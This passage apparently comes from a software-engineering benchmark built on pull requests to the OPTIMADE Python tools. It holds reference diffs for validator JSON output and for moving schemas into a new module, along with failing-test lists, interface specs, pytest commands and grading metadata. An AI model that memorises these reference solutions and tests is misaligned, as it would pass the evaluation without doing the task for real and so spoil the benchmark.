validator.optional_failure_count == 0 - assert validator.internal_failure_count == 0 + assert validator.results.success_count == 0 + assert validator.results.optional_success_count == 0 + assert validator.results.failure_count == 1 + assert validator.results.optional_failure_count == 0 + assert validator.results.internal_failure_count == 0 assert output[0] is None assert output[1] == "ResponseError: Stage of test failed" assert ( - validator.failure_messages[-1][0] + validator.results.failure_messages[-1][0] == "✖: http://example.org/test_request - dummy_test_case - failed with error" ) - assert validator.failure_messages[-1][1] == ["ResponseError: Stage of test failed"] + assert validator.results.failure_messages[-1][1] == [ + "ResponseError: Stage of test failed" + ] def test_fail_fast_test_case(): @@ -281,18 +285,18 @@ def test_fail_fast_test_case(): raise_exception=ResponseError("Optional test failed"), optional=True, ) - assert validator.success_count == 0 - assert validator.optional_success_count == 0 - assert validator.failure_count == 0 - assert validator.optional_failure_count == 1 - assert validator.internal_failure_count == 0 + assert validator.results.success_count == 0 + assert validator.results.optional_success_count == 0 + assert validator.results.failure_count == 0 + assert validator.results.optional_failure_count == 1 + assert validator.results.internal_failure_count == 0 assert output[0] is None assert output[1] == "ResponseError: Optional test failed" - assert validator.optional_failure_messages[-1][0] == ( + assert validator.results.optional_failure_messages[-1][0] == ( "✖: http://example.org/test_request - dummy_test_case - failed with error" ) - assert validator.optional_failure_messages[-1][1] == [ + assert validator.results.optional_failure_messages[-1][1] == [ "ResponseError: Optional test failed" ] @@ -305,15 +309,15 @@ def test_fail_fast_test_case(): raise_exception=ResponseError("Non-optional test failed"), optional=False, ) - assert validator.success_count == 0 - assert validator.optional_success_count == 0 - assert validator.failure_count == 1 - assert validator.optional_failure_count == 1 - assert validator.internal_failure_count == 0 - assert validator.failure_messages[-1][0] == ( + assert validator.results.success_count == 0 + assert validator.results.optional_success_count == 0 + assert validator.results.failure_count == 1 + assert validator.results.optional_failure_count == 1 + assert validator.results.internal_failure_count == 0 + assert validator.results.failure_messages[-1][0] == ( "✖: http://example.org/test_request - dummy_test_case - failed with error" ) - assert validator.failure_messages[-1][1] == [ + assert validator.results.failure_messages[-1][1] == [ "ResponseError: Non-optional test failed" ] @@ -325,15 +329,15 @@ def test_fail_fast_test_case(): request="test_request", raise_exception=FileNotFoundError("Internal error"), ) - assert validator.success_count == 0 - assert validator.optional_success_count == 0 - assert validator.failure_count == 1 - assert validator.optional_failure_count == 1 - assert validator.internal_failure_count == 1 - assert validator.internal_failure_messages[-1][0] == ( + assert validator.results.success_count == 0 + assert validator.results.optional_success_count == 0 + assert validator.results.failure_count == 1 + assert validator.results.optional_failure_count == 1 + assert validator.results.internal_failure_count == 1 + assert validator.results.internal_failure_messages[-1][0] == ( "!: http://example.org/test_request - dummy_test_case - failed with internal error" ) - assert validator.internal_failure_messages[-1][1] == [ + assert validator.results.internal_failure_messages[-1][1] == [ "FileNotFoundError: Internal error" ] @@ -353,8 +357,8 @@ def test_that_system_exit_is_fatal_in_test_case(): optional=True, ) - assert validator.success_count == 0 - assert validator.optional_success_count == 0 - assert validator.failure_count == 0 - assert validator.optional_failure_count == 0 - assert validator.internal_failure_count == 0 + assert validator.results.success_count == 0 + assert validator.results.optional_success_count == 0 + assert validator.results.failure_count == 0 + assert validator.results.optional_failure_count == 0 + assert validator.results.internal_failure_count == 0
[ "tests/validator/test_utils.py::test_normal_test_case", "tests/validator/test_utils.py::test_optional_test_case", "tests/validator/test_utils.py::test_ignored_test_case", "tests/validator/test_utils.py::test_skip_optional_test_case", "tests/validator/test_utils.py::test_expected_failure_test_case", "tests/validator/test_utils.py::test_unexpected_failure_test_case", "tests/validator/test_utils.py::test_multistage_test_case", "tests/validator/test_utils.py::test_fail_fast_test_case", "tests/validator/test_utils.py::test_that_system_exit_is_fatal_in_test_case" ]
[]
Method: ImplementationValidator.__init__(self, client=None, base_url=None, verbosity: int = 0, respond_json: bool = False, page_limit: int = 5, max_retries: int = 5, run_optional_tests: bool = True, fail_fast: bool = False, as_type=None, index: bool = False) Location: optimade.validator.validator – class ImplementationValidator constructor Inputs: optional client instance, base URL string, integer verbosity level, boolean ``respond_json`` flag that selects JSON‑only output, pagination limit, retry count, flags for running optional tests and fail‑fast mode, optional ``as_type`` conversion class, and a boolean indicating whether the validator is run against the main index. Outputs: creates an ``ImplementationValidator`` instance with an internal ``respond_json`` attribute and a ``results`` attribute (instance of ``ValidatorResults``). The flag influences later logging and output behaviour. Description: Constructs the validator object; the new ``respond_json`` parameter activates a mode where only a JSON summary of validation results is emitted to stdout. Class: ValidatorResults Location: optimade.validator.validator – dataclass defined alongside ``ImplementationValidator`` Inputs: None (all fields have default values). Outputs: dataclass instance exposing: - ``success_count`` (int) - ``failure_count`` (int) - ``internal_failure_count`` (int) - ``optional_success_count`` (int) - ``optional_failure_count`` (int) - ``failure_messages`` (List[Tuple[str, str]]) - ``internal_failure_messages`` (List[Tuple[str, str]]) - ``optional_failure_messages`` (List[Tuple[str, str]]) Description: Holds aggregated counts and messages for all validation tests; used by the validator to report results and to generate the JSON summary when ``respond_json`` is enabled. Method: ImplementationValidator.print_summary(self) Location: optimade.validator.validator – method of ``ImplementationValidator`` Inputs: none (relies on instance state). Outputs: - If ``self.respond_json`` is ``True``: prints a JSON‑encoded representation of ``self.results`` to stdout and returns immediately. - Otherwise: prints human‑readable failure, optional‑failure, and internal‑failure sections followed by a textual summary of passed/failed tests. Description: Emits the final validation report; the added JSON‑output branch is exercised when the validator is created with ``respond_json=True``.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/server/test_server_validation.py tests/validator/test_utils.py" }
{ "num_modified_files": 4, "num_modified_lines": 76, "pr_author": "ml-evs", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests a JSON output flag for the validator and a restructuring of result tracking. The tests check that the flag produces a JSON dump, that the validator's success/failure counters are accessed via a new dataclass, and that verbosity is suppressed. The test expectations match the described behavior and no unrelated modules, naming mismatches, external info, or ambiguity are present, so the task is clearly specified and solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
c34f8a066011aa1c7bfed254f9b629d24406e761
2020-09-21 11:04:40
codecov[bot]: # [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/511?src=pr&el=h1) Report > Merging [#511](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/511?src=pr&el=desc) into [master](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/41c26e5a7b8297aaffe9ae83112a17a0af01d3d4?el=desc) will **increase** coverage by `0.00%`. > The diff coverage is `100.00%`. [![Impacted file tree graph](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/511/graphs/tree.svg?width=650&height=150&src=pr&token=UJAtmqkZZO)](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/511?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## master #511 +/- ## ======================================= Coverage 91.59% 91.59% ======================================= Files 61 62 +1 Lines 3118 3119 +1 ======================================= + Hits 2856 2857 +1 Misses 262 262 ``` | Flag | Coverage Δ | | |---|---|---| | #project | `91.59% <100.00%> (+<0.01%)` | :arrow_up: | | #validator | `63.73% <100.00%> (+0.01%)` | :arrow_up: | Flags with carried forward coverage won't be shown. [Click here](https://docs.codecov.io/docs/carryforward-flags#carryforward-flags-in-the-pull-request-comment) to find out more. | [Impacted Files](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/511?src=pr&el=tree) | Coverage Δ | | |---|---|---| | [optimade/server/routers/utils.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/511/diff?src=pr&el=tree#diff-b3B0aW1hZGUvc2VydmVyL3JvdXRlcnMvdXRpbHMucHk=) | `97.72% <ø> (-0.29%)` | :arrow_down: | | [optimade/server/routers/info.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/511/diff?src=pr&el=tree#diff-b3B0aW1hZGUvc2VydmVyL3JvdXRlcnMvaW5mby5weQ==) | `96.15% <100.00%> (ø)` | | | [optimade/server/schemas.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/511/diff?src=pr&el=tree#diff-b3B0aW1hZGUvc2VydmVyL3NjaGVtYXMucHk=) | `100.00% <100.00%> (ø)` | | ------ [Continue to review full report at Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/511?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/511?src=pr&el=footer). Last update [41c26e5...eddaf86](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/511?src=pr&el=lastupdated). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments). ml-evs: > On another note, are you sure we don't need to take `allOf`, `anyOf`, etc. into account in the recursive function? I'm sure _for now_... I think the problem we were having was also providing a schema for the links endpoint, which was running into the multiple allowed response types. We don't have that anywhere in our structure/reference models so this should be useful as is.
materials-consortia__optimade-python-tools-511
diff --git a/docs/api_reference/server/schemas.md b/docs/api_reference/server/schemas.md new file mode 100644 index 00000000..7bdb6e54 --- /dev/null +++ b/docs/api_reference/server/schemas.md @@ -0,0 +1,3 @@ +# schemas + +::: optimade.server.schemas diff --git a/optimade/server/routers/info.py b/optimade/server/routers/info.py index e138238f..f96aadfb 100644 --- a/optimade/server/routers/info.py +++ b/optimade/server/routers/info.py @@ -11,24 +11,17 @@ from optimade.models import ( ErrorResponse, InfoResponse, EntryInfoResponse, - ReferenceResource, - StructureResource, ) +from optimade.server.schemas import ENTRY_INFO_SCHEMAS, retrieve_queryable_properties from optimade.server.routers.utils import ( meta_values, - retrieve_queryable_properties, get_base_url, ) router = APIRouter(redirect_slashes=True) -ENTRY_INFO_SCHEMAS = { - "structures": StructureResource.schema, - "references": ReferenceResource.schema, -} - @router.get( "/info", diff --git a/optimade/server/routers/utils.py b/optimade/server/routers/utils.py index 06a7a70f..95c9649b 100644 --- a/optimade/server/routers/utils.py +++ b/optimade/server/routers/utils.py @@ -14,9 +14,6 @@ from optimade.models import ( EntryResponseMany, EntryResponseOne, ToplevelLinks, - ReferenceResource, - StructureResource, - DataType, ) from optimade.server.config import CONFIG @@ -24,11 +21,6 @@ from optimade.server.entry_collections import EntryCollection from optimade.server.exceptions import BadRequest from optimade.server.query_params import EntryListingQueryParams, SingleEntryQueryParams -ENTRY_INFO_SCHEMAS = { - "structures": StructureResource.schema, - "references": ReferenceResource.schema, -} - # we need to get rid of any release tags (e.g. -rc.2) and any build metadata (e.g. +py36) # from the api_version before allowing the URL BASE_URL_PREFIXES = { @@ -271,34 +263,6 @@ def get_single_entry( ) -def retrieve_queryable_properties(schema: dict, queryable_properties: list) -> dict: - properties = {} - for name, value in schema["properties"].items(): - if name in queryable_properties: - if "$ref" in value: - path = value["$ref"].split("/")[1:] - sub_schema = schema.copy() - while path: - next_key = path.pop(0) - sub_schema = sub_schema[next_key] - sub_queryable_properties = sub_schema["properties"].keys() - properties.update( - retrieve_queryable_properties(sub_schema, sub_queryable_properties) - ) - else: - properties[name] = {"description": value.get("description", "")} - if "unit" in value: - properties[name]["unit"] = value["unit"] - # All properties are sortable with the MongoDB backend. - # While the result for sorting lists may not be as expected, they are still sorted. - properties[name]["sortable"] = True - # Try to get OpenAPI-specific "format" if possible, else get "type"; a mandatory OpenAPI key. - properties[name]["type"] = DataType.from_json_type( - value.get("format", value["type"]) - ) - return properties - - def mongo_id_for_database(database_id: str, database_type: str) -> str: """Produce a MondoDB ObjectId for a database""" from bson.objectid import ObjectId diff --git a/optimade/server/schemas.py b/optimade/server/schemas.py new file mode 100644 index 00000000..d059a815 --- /dev/null +++ b/optimade/server/schemas.py @@ -0,0 +1,50 @@ +from optimade.models import DataType, StructureResource, ReferenceResource + +ENTRY_INFO_SCHEMAS = { + "structures": StructureResource.schema, + "references": ReferenceResource.schema, +} + + +def retrieve_queryable_properties(schema: dict, queryable_properties: list) -> dict: + """Recurisvely loops through the schema of a pydantic model and + resolves all references, returning a dictionary of all the + OPTIMADE-queryable properties of that model. + + Parameters: + schema: The schema of the pydantic model. + queryable_properties: The list of properties to find in the schema. + + Returns: + A flat dictionary with properties as keys, containing the field + description, unit, sortability, support level, queryability + and type, where provided. + + """ + properties = {} + for name, value in schema["properties"].items(): + if name in queryable_properties: + if "$ref" in value: + path = value["$ref"].split("/")[1:] + sub_schema = schema.copy() + while path: + next_key = path.pop(0) + sub_schema = sub_schema[next_key] + sub_queryable_properties = sub_schema["properties"].keys() + properties.update( + retrieve_queryable_properties(sub_schema, sub_queryable_properties) + ) + else: + properties[name] = {"description": value.get("description", "")} + # Update schema with extension keys provided they are not None + for key in [_ for _ in ("unit", "queryable", "support") if _ in value]: + properties[name][key] = value[key] + # All properties are sortable with the MongoDB backend. + # While the result for sorting lists may not be as expected, they are still sorted. + properties[name]["sortable"] = value.get("sortable", True) + # Try to get OpenAPI-specific "format" if possible, else get "type"; a mandatory OpenAPI key. + properties[name]["type"] = DataType.from_json_type( + value.get("format", value["type"]) + ) + + return properties
Move entry schemas to separate submodule This PR is a shortcut version of #277 whilst retaining most of its features. The `ENTRY_INFO_SCHEMA` constant dict has been moved to a new submodule and new extension fields ("support" and "queryable") are now made available so they can also be used by the validator more cleanly in #503, and eventually in the server code in #504. All that is missing to enable #277 is to wrap this in a class to provide a nicer interface for implementations to use their own models in `ENTRY_INFO_SCHEMAS` rather than the hardcoded `StructureResource` etc. I think this is a less important point than the other bits though.
**Title** Centralize entry schemas and extend queryable property handling **Problem** Server routes needed a reliable source for entry model schemas, but the schemas were scattered and the utility for extracting queryable properties did not recognise the newly‑added extension fields. This caused duplication and limited extensibility for future schema features. **Root Cause** The schema definitions were embedded in multiple modules, and the property‑retrieval logic only accounted for a subset of schema extensions. **Fix / Expected Behavior** - Relocate the entry schema mapping to a dedicated schema component, providing a single source of truth. - Adjust server routers to import the schema mapping from the new component. - Enhance the queryable‑property extraction routine to propagate additional extension keys (e.g., “unit”, “queryable”, “support”) when present. - Preserve existing functionality for sortable and type information while supporting the new extensions. - Ensure the API documentation reflects the new schema module. **Risk & Validation** - Verify that all `/info` and related endpoints continue to return correct schema metadata. - Run the existing test suite, focusing on schema validation and queryable property listings. - Confirm that documentation builds without errors and accurately lists the exposed schemas.
511
Materials-Consortia/optimade-python-tools
diff --git a/tests/server/test_schemas.py b/tests/server/test_schemas.py new file mode 100644 index 00000000..dfb5c980 --- /dev/null +++ b/tests/server/test_schemas.py @@ -0,0 +1,32 @@ +from optimade.server.schemas import ENTRY_INFO_SCHEMAS, retrieve_queryable_properties + + +def test_schemas(): + """Test that the default `ENTRY_INFO_SCHEMAS` contain + all the required information about the OPTIMADE properties + after dereferencing. + + """ + for entry in ("Structures", "References"): + schema = ENTRY_INFO_SCHEMAS[entry.lower()]() + + top_level_props = ("id", "type", "attributes") + properties = retrieve_queryable_properties(schema, top_level_props) + + fields = list( + schema["definitions"][f"{entry[:-1]}ResourceAttributes"][ + "properties" + ].keys() + ) + fields += ["id", "type"] + + # Check all fields are present + assert all(field in properties for field in fields) + + # Check that there are no references to definitions remaining + assert "$ref" not in properties + assert not any("$ref" in properties[field] for field in properties) + + # Check that all expected keys are present for OPTIMADE fields + for key in ("type", "sortable", "queryable", "description"): + assert all(key in properties[field] for field in properties)
[ "tests/server/test_schemas.py::test_schemas" ]
[]
Function: retrieve_queryable_properties(schema: dict, queryable_properties: list) Location: optimade.server.schemas Inputs: - **schema** (dict): JSON schema dictionary produced by a Pydantic model (e.g., `StructureResource.schema`). - **queryable_properties** (list): Iterable of top‑level property names that should be inspected (e.g., `["id", "type", "attributes"]`). Outputs: - **dict** mapping each resolved property name to a dictionary containing: - `description` (str) – field description (empty string if missing). - Optional `unit`, `queryable`, `support` – passed through from the original schema when present. - `sortable` (bool) – always `True` unless overridden in the schema. - `type` (optimade.models.DataType) – the OpenAPI type derived via `DataType.from_json_type`. Description: Recursively walks a Pydantic model’s JSON schema, follows any ``$ref`` references, and builds a flat dictionary of all OPTIMADE‑queryable fields with their metadata, now also exposing the optional ``queryable`` and ``support`` extension keys.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/server/test_schemas.py" }
{ "num_modified_files": 4, "num_modified_lines": 54, "pr_author": "ml-evs", "pr_labels": [ "enhancement: New feature or request", "priority/medium: Issue or PR with a consensus of medium priority" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.94, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "dev_ops_enh", "documentation_enh" ], "reason": null, "reasoning": "The issue requests moving the entry schema definitions and helper into a new server.schemas submodule and updating imports accordingly. The provided test imports ENTRY_INFO_SCHEMAS and retrieve_queryable_properties from that module and validates their behavior, which matches the described functionality. No evidence of missing specifications, external dependencies, or implicit expectations beyond the stated API, so the task is cleanly solvable. Therefore it is classified as SOLVABLE (A).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
d207200c7cf8cbaf71dd0f3c4deb67115e4155eb
2020-10-19 21:29:37
codecov[bot]: # [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/560?src=pr&el=h1) Report > Merging [#560](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/560?src=pr&el=desc) into [master](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/e7432a2cdbd38f78c7d2dbfacc115d461e4dd9c0?el=desc) will **increase** coverage by `0.03%`. > The diff coverage is `100.00%`. [![Impacted file tree graph](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/560/graphs/tree.svg?width=650&height=150&src=pr&token=UJAtmqkZZO)](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/560?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## master #560 +/- ## ========================================== + Coverage 91.47% 91.51% +0.03% ========================================== Files 62 62 Lines 3110 3110 ========================================== + Hits 2845 2846 +1 + Misses 265 264 -1 ``` | Flag | Coverage Δ | | |---|---|---| | #project | `91.51% <100.00%> (+0.03%)` | :arrow_up: | | #validator | `63.53% <100.00%> (ø)` | | Flags with carried forward coverage won't be shown. [Click here](https://docs.codecov.io/docs/carryforward-flags#carryforward-flags-in-the-pull-request-comment) to find out more. | [Impacted Files](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/560?src=pr&el=tree) | Coverage Δ | | |---|---|---| | [optimade/models/structures.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/560/diff?src=pr&el=tree#diff-b3B0aW1hZGUvbW9kZWxzL3N0cnVjdHVyZXMucHk=) | `95.62% <100.00%> (+0.54%)` | :arrow_up: | ------ [Continue to review full report at Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/560?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/560?src=pr&el=footer). Last update [e7432a2...842f65b](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/560?src=pr&el=lastupdated). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments). ml-evs: Following discussions in the meeting today, it was agreed that we would go down the "required optional" key route for OPTIMADE should fields, so the changes in this PR should (and do) preserve the OpenAPI schema as it is. This has the side effect that some valid OPTIMADE responses will not be able to validated against the OpenAPI schema (which is the case at the moment anyway). This is mostly due to a mismatch between our definitions and OpenAPI, which we can consider tidying in the specification text. We could consider patching the OpenAPI schema for these SHOULD field models with the OpenAPI property `nullable`, and if we're feeling extra charitable we could try port it upstream to pydantic/FastAPI... CasperWA: What's the motivation behind only testing the server for the real MongoDB in the CI? ml-evs: > What's the motivation behind only testing the server for the real MongoDB in the CI? The server tests are the only bits that use the backend, so testing everything twice is redundant. When I first added the tests in this PR on all of our structures, it was taking 4-5 mins *per backend* to run. You could argue that these tests are overkill anyway (testing all possible combinations of 1-`N` fields being `null` in the response), but I think it's worth doing for at least a few structures. I reduced this to about ~1 minute by only testing a few structures, but it doesn't make sense to me to run e.g. the model tests with Mongo too. ml-evs: > > What's the motivation behind only testing the server for the real MongoDB in the CI? > > The server tests are the only bits that use the backend, so testing everything twice is redundant. When I first added the tests in this PR on all of our structures, it was taking 4-5 mins _per backend_ to run. You could argue that these tests are overkill anyway (testing all possible combinations of 1-`N` fields being `null` in the response), but I think it's worth doing for at least a few structures. I reduced this to about ~1 minute by only testing a few structures, but it doesn't make sense to me to run e.g. the model tests with Mongo too. Going to revisit this, I think coverage might actually improve if testing was performed on *only* the awkward edge-case structure, which will speed things up massively. Then we can decide whether we want to keep running all tests with Mongo for extra redudancy CasperWA: > > What's the motivation behind only testing the server for the real MongoDB in the CI? > > The server tests are the only bits that use the backend, so testing everything twice is redundant. When I first added the tests in this PR on all of our structures, it was taking 4-5 mins _per backend_ to run. You could argue that these tests are overkill anyway (testing all possible combinations of 1-`N` fields being `null` in the response), but I think it's worth doing for at least a few structures. I reduced this to about ~1 minute by only testing a few structures, but it doesn't make sense to me to run e.g. the model tests with Mongo too. Great. And sounds completely reasonable 👍 ml-evs: Have added the root validator directly into this PR to see how it interacts with the model changes, but it could also be pulled out. As we're only raising warnings (for now) on `null`, the `if v is None` bits of the field validators should still stay in. One important think to check is how well `CORRELATED_STRUCTURE_FIELDS` matches with the specification, and if there are any better ways we could include it (instead of a module level constant). ml-evs: > Let's get this in now and optimize afterwards. > This is blocking some things in my implementation as well. > > Thanks @ml-evs ! muscle Could I be slightly awkward and request that we merge #591 (tiny changes but removes a false negative for validation), release a very minor 0.12.4, and _then_ merge this, ready to release 0.13 after the other bigger PRs are finished?
materials-consortia__optimade-python-tools-560
diff --git a/.github/workflows/deps_lint.yml b/.github/workflows/deps_lint.yml index 2f1dacb0..3650a70c 100644 --- a/.github/workflows/deps_lint.yml +++ b/.github/workflows/deps_lint.yml @@ -175,8 +175,8 @@ jobs: pip install -r requirements.txt pip install -r requirements-dev.txt - - name: Run all tests (using a real MongoDB) - run: pytest -rs -vvv --cov=./optimade/ --cov-report=xml tests/ + - name: Run server tests (using a real MongoDB) + run: pytest -rs -vvv --cov=./optimade/ --cov-report=xml tests/server env: OPTIMADE_CI_FORCE_MONGO: 1 diff --git a/openapi/openapi.json b/openapi/openapi.json index b46e0731..b8bc3301 100644 --- a/openapi/openapi.json +++ b/openapi/openapi.json @@ -3020,7 +3020,8 @@ "title": "Last Modified", "type": "string", "description": "Date and time representing when the entry was last modified.\n\n- **Type**: timestamp.\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property with support for all mandatory filter features.\n - **Response**: REQUIRED in the response unless the query parameter `response_fields` is present and does not include this property.\n\n- **Example**:\n - As part of JSON response format: `\"2007-04-05T14:30:20Z\"` (i.e., encoded as an [RFC 3339 Internet Date/Time Format](https://tools.ietf.org/html/rfc3339#section-5.6) string.)", - "format": "date-time" + "format": "date-time", + "nullable": true }, "elements": { "title": "Elements", @@ -3028,12 +3029,14 @@ "items": { "type": "string" }, - "description": "Names of the different elements present in the structure.\n\n- **Type**: list of strings.\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property with support for all mandatory filter features.\n - The strings are the chemical symbols, i.e., either a single uppercase letter or an uppercase letter followed by a number of lowercase letters.\n - The order MUST be alphabetical.\n - Note: This property SHOULD NOT contain the string \"X\" to indicate non-chemical elements or \"vacancy\" to indicate vacancies (in contrast to the field `chemical_symbols` for the `species` property).\n\n- **Examples**:\n - `[\"Si\"]`\n - `[\"Al\",\"O\",\"Si\"]`\n\n- **Query examples**:\n - A filter that matches all records of structures that contain Si, Al **and** O, and possibly other elements: `elements HAS ALL \"Si\", \"Al\", \"O\"`.\n - To match structures with exactly these three elements, use `elements HAS ALL \"Si\", \"Al\", \"O\" AND elements LENGTH 3`." + "description": "Names of the different elements present in the structure.\n\n- **Type**: list of strings.\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property with support for all mandatory filter features.\n - The strings are the chemical symbols, i.e., either a single uppercase letter or an uppercase letter followed by a number of lowercase letters.\n - The order MUST be alphabetical.\n - Note: This property SHOULD NOT contain the string \"X\" to indicate non-chemical elements or \"vacancy\" to indicate vacancies (in contrast to the field `chemical_symbols` for the `species` property).\n\n- **Examples**:\n - `[\"Si\"]`\n - `[\"Al\",\"O\",\"Si\"]`\n\n- **Query examples**:\n - A filter that matches all records of structures that contain Si, Al **and** O, and possibly other elements: `elements HAS ALL \"Si\", \"Al\", \"O\"`.\n - To match structures with exactly these three elements, use `elements HAS ALL \"Si\", \"Al\", \"O\" AND elements LENGTH 3`.", + "nullable": true }, "nelements": { "title": "Nelements", "type": "integer", - "description": "Number of different elements in the structure as an integer.\n\n- **Type**: integer\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property with support for all mandatory filter features.\n\n- **Examples**:\n - `3`\n\n- **Querying**:\n - Note: queries on this property can equivalently be formulated using `elements LENGTH`.\n - A filter that matches structures that have exactly 4 elements: `nelements=4`.\n - A filter that matches structures that have between 2 and 7 elements: `nelements>=2 AND nelements<=7`." + "description": "Number of different elements in the structure as an integer.\n\n- **Type**: integer\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property with support for all mandatory filter features.\n\n- **Examples**:\n - `3`\n\n- **Querying**:\n - Note: queries on this property can equivalently be formulated using `elements LENGTH`.\n - A filter that matches structures that have exactly 4 elements: `nelements=4`.\n - A filter that matches structures that have between 2 and 7 elements: `nelements>=2 AND nelements<=7`.", + "nullable": true }, "elements_ratios": { "title": "Elements Ratios", @@ -3041,18 +3044,21 @@ "items": { "type": "number" }, - "description": "Relative proportions of different elements in the structure.\n\n- **Type**: list of floats\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property with support for all mandatory filter features.\n - Composed by the proportions of elements in the structure as a list of floating point numbers.\n - The sum of the numbers MUST be 1.0 (within floating point accuracy)\n\n- **Examples**:\n - `[1.0]`\n - `[0.3333333333333333, 0.2222222222222222, 0.4444444444444444]`\n\n- **Query examples**:\n - Note: Useful filters can be formulated using the set operator syntax for correlated values.\n However, since the values are floating point values, the use of equality comparisons is generally inadvisable.\n - OPTIONAL: a filter that matches structures where approximately 1/3 of the atoms in the structure are the element Al is: `elements:elements_ratios HAS ALL \"Al\":>0.3333, \"Al\":<0.3334`." + "description": "Relative proportions of different elements in the structure.\n\n- **Type**: list of floats\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property with support for all mandatory filter features.\n - Composed 